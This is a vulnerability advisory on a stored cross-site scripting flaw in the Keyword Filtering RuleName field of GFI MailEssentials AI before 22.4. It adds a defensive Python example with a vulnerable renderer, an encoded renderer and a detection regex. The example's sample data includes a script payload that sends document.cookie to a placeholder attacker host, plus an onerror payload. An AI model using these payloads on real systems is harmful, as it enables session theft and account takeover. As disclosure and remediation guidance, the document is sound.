Impact
The vulnerability is a stored cross-site scripting flaw: an authenticated user can place HTML or JavaScript in the RuleName field when creating a Keyword Filtering rule. The server stores the value as entered and later renders it without output encoding in the management interface, so the script runs in the browser of any logged-in user who views the rule list. An attacker can use this to read session cookies that are not protected by the HttpOnly flag, perform actions in the victim's name through the interface, or carry out any other operation the victim's account is allowed to perform in the application.
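The following added example is not the product's code and is not taken from the advisory; it models the mechanism described above in Python with a constructed rule store. It shows the rule name concatenated straight into markup (the stored-XSS sink), the same row rendered with HTML output encoding (the equivalent in an ASP.NET page is HttpUtility.HtmlEncode or the <%: %> syntax), and a check that scans already-stored rule names for injected markup, which is what a defender wants to run after patching. The rule names, field layout and attacker host are all assumptions made for illustration.

```python
import html
import re

# Constructed sample of a rule store after a malicious user has saved rules.
# Illustrative data only; the attacker host is a placeholder, not from the advisory.
STORED_RULES = [
    {"id": 1, "name": "Block invoice scams"},
    {"id": 2, "name": "<script>fetch('https://attacker.example/c?'+document.cookie)</script>"},
    {"id": 3, "name": 'Quarantine "urgent" <img src=x onerror=alert(1)>'},
]


def render_rule_row_vulnerable(rule):
    """Concatenates the stored name straight into HTML: the stored-XSS sink.

    Whatever was saved in RuleName is parsed by the browser as markup.
    """
    return f"<tr><td>{rule['id']}</td><td>{rule['name']}</td></tr>"


def render_rule_row_safe(rule):
    """Applies HTML-body output encoding so the name is shown as text.

    html.escape turns < > & " ' into entities; this is correct for the HTML
    body and quoted-attribute contexts. A JavaScript or URL context would need
    a different encoder, so the context of every sink must be checked.
    """
    return f"<tr><td>{rule['id']}</td><td>{html.escape(rule['name'], quote=True)}</td></tr>"


# Rough indicators of markup or script in a field that should only hold a label:
# a tag opener, an on*= event handler, or a javascript: URL.
_MARKUP_HINT = re.compile(r"<\s*/?\s*[a-zA-Z]|\bon[a-zA-Z]+\s*=|javascript:", re.IGNORECASE)


def find_suspicious_rules(rules):
    """Returns ids of stored rules whose name looks like injected HTML/JS.

    Run against the rule store after applying the fix: patching stops new
    payloads from executing only if the vendor fix encodes on output; rules
    planted before the patch should still be reviewed and cleaned.
    """
    return [r["id"] for r in rules if _MARKUP_HINT.search(r["name"])]


if __name__ == "__main__":
    for r in STORED_RULES:
        print("vulnerable:", render_rule_row_vulnerable(r))
        print("hardened:  ", render_rule_row_safe(r))
    print("suspicious rule ids:", find_suspicious_rules(STORED_RULES))
```

The regular expression is a triage aid, not a parser: it flags names worth a human look and will produce the occasional false positive on legitimate text containing angle brackets, which is acceptable for a field that should never hold markup.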
Affected Systems
The affected product is GFI Software MailEssentials AI in versions older than 22.4. The flaw resides in the contentchecking.aspx page of the MailSecurity component, which handles Keyword Filtering rule creation. Every installation running a release before 22.4 is affected; deployment size or location makes no difference, since the vulnerable page is part of the standard management interface.
Risk and Exploitability
The CVSS base score is 5.1 (Medium). The exploitation probability is very low, with an EPSS score below 1%, and the flaw is not listed in the CISA KEV catalog. Exploitation requires an authenticated account with permission to create or edit keyword filtering rules. The injected script runs only in the victim's browser; the flaw does not by itself give code execution on the MailEssentials server. The attacker does, however, act with whatever rights the victim holds in the management interface, so a low-privileged rule editor whose payload is later viewed by an administrator can perform administrative actions in the product. Organizations should therefore update to 22.4 or later and, after patching, review existing keyword filtering rule names for HTML markup planted before the fix.
OpenCVE Enrichment